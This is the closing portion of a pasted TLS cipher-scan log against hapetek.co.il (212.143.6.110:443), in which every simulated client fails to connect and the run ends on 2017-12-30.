  3420.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  3421.  
  3422. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  3423. -----------------------------------------------------------------------------------------------------------------------------
  3424.  
  3425. Could not determine the protocol, only simulating generic clients.
  3426.  
  3427.  Running client simulations via sockets 
  3428.  
  3429. Java 6u45 No connection
  3430. Java 7u25 No connection
  3431. Java 8u31 No connection
  3432. OpenSSL 1.0.1l No connection
  3433. OpenSSL 1.0.2e No connection
  3434.  
  3435.  Done 2017-12-30 22:26:49 [ 521s] -->> 212.143.6.110:443 (hapetek.co.il) <<--
  3436. ######################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement